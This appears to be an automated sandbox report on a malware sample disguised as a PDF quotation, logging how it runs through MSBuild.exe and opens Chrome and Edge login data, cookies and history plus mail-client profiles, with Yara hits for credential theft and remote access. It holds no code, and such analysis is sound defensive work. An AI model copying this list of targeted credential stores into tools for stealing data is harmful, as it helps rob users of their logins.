Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Source: Yara match

File source: 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8188, type: MEMORYSTR

Source: Yara match	File source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8188, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8188, type: MEMORYSTR

Remote Access Functionality

Source: Yara match

File source: 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8188, type: MEMORYSTR

Source: Yara match	File source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8188, type: MEMORYSTR